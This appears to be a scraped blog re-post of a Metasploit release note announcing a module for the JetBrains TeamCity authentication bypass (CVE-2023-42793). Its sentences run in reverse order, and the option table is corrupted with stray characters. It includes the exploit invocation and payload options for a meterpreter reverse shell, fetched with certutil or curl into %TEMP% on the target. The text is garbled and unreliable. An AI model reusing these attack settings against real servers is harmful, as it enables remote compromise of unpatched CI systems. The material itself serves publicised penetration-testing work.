Running automatic check ("set AutoCheck false" to disable) Msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit View the full module info with the info, or info -d command. LHOST 192.168.250.134 yes The listen address (an interface may be specified) Payload options (cmd/windows/http/圆4/meterpreter/reverse_tcp):ĮXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)įETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)įETCH_DELETE false yes Attempt to delete the binary after executionįETCH_FILENAME cymQYMMk no Name to use on remote system when storing payload cannot contain spaces.įETCH_SRVHOST no Local IP to use for serving payloadįETCH_SRVPORT 8080 yes Local port to use for serving payloadįETCH_URIPATH no Local URI to use for serving payloadįETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload cannot contain spaces. TEAMCITY_CHANGE_TIMEOUT 30 yes The timeout to wait for the changes to be applied TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as SSL false no Negotiate SSL/TLS for outgoing connections Proxies no A proxy chain of format type:host:port Name Current Setting Required Description Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793): Example usage: msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options This exploit works against both Windows and Linux targets. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who additionally published a technical analysis on AttackerKB for CVE-2023-42793. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. Last updated at Mon, 20:33:29 GMT TeamCity authentication bypass and remote code execution
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |